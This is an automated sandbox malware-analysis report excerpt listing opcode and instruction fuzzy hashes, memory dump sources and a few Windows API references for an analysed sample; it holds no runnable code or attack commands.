                                                        • Opcode ID: bcaeed6e48b24ae2a8cd28d1105d407858c563e08032dd46f6af0fe4f131f9e0
                                                        • Instruction ID: 4bae2713ce7709fe8da5589f50bc1a219f305d3d105056fe83fc3629ebc2cdfc
                                                        • Opcode Fuzzy Hash: bcaeed6e48b24ae2a8cd28d1105d407858c563e08032dd46f6af0fe4f131f9e0
                                                        • Instruction Fuzzy Hash: 3431B633A219114BE314CA29CD4479632D2ABD8328F3E86B99465DF7D2DD3B9D0386C0
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a2a4d5fd578bd396aa0af15cb6ab0e54a13c3b7b2a9c76c21a4d61f111652cf1
                                                        • Instruction ID: 1389e4d53b694fd295f4c99b563822772ee8ec12a6424706be6842d5b3f5de1d
                                                        • Opcode Fuzzy Hash: a2a4d5fd578bd396aa0af15cb6ab0e54a13c3b7b2a9c76c21a4d61f111652cf1
                                                        • Instruction Fuzzy Hash: 40311973A197144FC3289D7D889015BBB929BD5334F2A873EDAB54B3C1DE748C015786
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fbbfd85ed4625c5c4a602328de8fb4c924b8bb4c62c88757fd3e9dc444327da8
                                                        • Instruction ID: 6c2a7a40945fba97b60b2dc016bc6914b469ce470df0d3b36ab1ee23dd066ef4
                                                        • Opcode Fuzzy Hash: fbbfd85ed4625c5c4a602328de8fb4c924b8bb4c62c88757fd3e9dc444327da8
                                                        • Instruction Fuzzy Hash: 763159759483819BD718CB34C8A13BBBBD19B97318F189A2DE0E193391D338C5468B5B
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: aec1cfbcc0f08cee27abf22853a84cb241b0a967adefa26a82fd7ec6fe8abb82
                                                        • Instruction ID: debfc5dd17bc83b4888ed899efee17c0fbb67269f2955dd3302a8cbeb79cd110
                                                        • Opcode Fuzzy Hash: aec1cfbcc0f08cee27abf22853a84cb241b0a967adefa26a82fd7ec6fe8abb82
                                                        • Instruction Fuzzy Hash: 1B312673E21A380BC7088D3D9C1126A75829BD5265B9EC37DEDAADF3C2DA35DC0582D0
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 41305cf3b9d177b5ddb8f36fbe4dc537e4b4ae08f3accfdb3d01e3decd18bcb9
                                                        • Instruction ID: c3ef201410797beedfbb423dd4b6a4b613f7a1191b873fa7b6aad00fbf48a4bb
                                                        • Opcode Fuzzy Hash: 41305cf3b9d177b5ddb8f36fbe4dc537e4b4ae08f3accfdb3d01e3decd18bcb9
                                                        • Instruction Fuzzy Hash: D3210B6590D3C146D7394B3A44243B7EFE25FE7345F2C58AED0D987392DA798005871A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 080992afd48c0527231705f8ceffc0aba193dc8929bd9ea4cd8631f6a582b227
                                                        • Instruction ID: b0168b037b63377ee53a696943b9184fc20a9d47a10823b489a3532680c59eb7
                                                        • Opcode Fuzzy Hash: 080992afd48c0527231705f8ceffc0aba193dc8929bd9ea4cd8631f6a582b227
                                                        • Instruction Fuzzy Hash: 7B314B2290D6F30EC336892D449047E7AA05AE621472943FFDCF19B3C3C52AC94587E5
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ef136d90a11ccdb0dce14e10ad2ebc64eaa621fdbac3e539be7e273f88757557
                                                        • Instruction ID: ac5a2fd1a34d00fe81212d9a0dd75a5008a32a6ff7d51fa23ef38769660ba55c
                                                        • Opcode Fuzzy Hash: ef136d90a11ccdb0dce14e10ad2ebc64eaa621fdbac3e539be7e273f88757557
                                                        • Instruction Fuzzy Hash: 392129B971A1A10BD700DF399DD412B77A2D7C730671F4577DA80D3392C27AE80AC225
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: eaf3a552830be57f3b076121e3f4128acb6b5eaa3b8ddd6eb86dc69abef60401
                                                        • Instruction ID: f625d5dc7cc146dca826755e11d0e3d06b3d9b76c6b30af6ca5c7fe59dabf8e9
                                                        • Opcode Fuzzy Hash: eaf3a552830be57f3b076121e3f4128acb6b5eaa3b8ddd6eb86dc69abef60401
                                                        • Instruction Fuzzy Hash: 2C31F2766183418BD708CF39C89136BBBE2AB86318F18CA6DE4D1D7384D73C88458B92
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                        • Instruction ID: 34218d49f98f4d04757d6d7688404ab739ac49d953720a668d3546879b641f63
                                                        • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                        • Instruction Fuzzy Hash: 7411EC336491D40EC7158D3C8400566BF930A97735F1993DAF4F4973D2D52B8D8E835A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5b0bd2af23d8aba3338285f4a2fcfdf2a171a9890d65b304db72d3eef606dba8
                                                        • Instruction ID: e2b1fa06f32b2fd48b90287ee0e38661db697dc0127cfdde8b5722762f88e760
                                                        • Opcode Fuzzy Hash: 5b0bd2af23d8aba3338285f4a2fcfdf2a171a9890d65b304db72d3eef606dba8
                                                        • Instruction Fuzzy Hash: 440192F170171197DA209E15A5C172BB2A85F90708F18543ED84457342EB7DEC08C2DD
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 88e438cc32f6b5a12cb4a8709c5ccb5f2cf69f7e5815e22606a40b63f7bc33cd
                                                        • Instruction ID: 7b6863c9c9260bd0558c6f806dd5f9e3415f7290086a878cc0b8c3271b95cfd7
                                                        • Opcode Fuzzy Hash: 88e438cc32f6b5a12cb4a8709c5ccb5f2cf69f7e5815e22606a40b63f7bc33cd
                                                        • Instruction Fuzzy Hash: 6EF0F936544304ABE1105B459C40D3777AEFB9E728F104319F715332A1E772ED2197A9
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                        • Instruction ID: 65b04920acd8ec40befbc16cdab85cd19ddd64fc0dfac740f80379ed40623b4a
                                                        • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                        • Instruction Fuzzy Hash: 7CD0A7715487B50E57588D3C44A04BBFBE8E987712B1814AFE8D6E3206D225DC47469D
                                                        APIs
                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0042561D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID: EnvironmentExpandStrings
                                                        • String ID: $%$p:#$MO
                                                        • API String ID: 237503144-3521940197
                                                        • Opcode ID: 23a9facff3ed32d27b45f5c78396115d40fb07a2703201d84f017c1d29451edb
                                                        • Instruction ID: 81944db62257c61826c9772faf3d9c506449667b4075365b7c5b7f4bc0eeec7d
                                                        • Opcode Fuzzy Hash: 23a9facff3ed32d27b45f5c78396115d40fb07a2703201d84f017c1d29451edb
                                                        • Instruction Fuzzy Hash: 6141DF365183448FE310CF24C88475FBBE2FFC5758F16892CE4D49B680D6B9CA0A8B86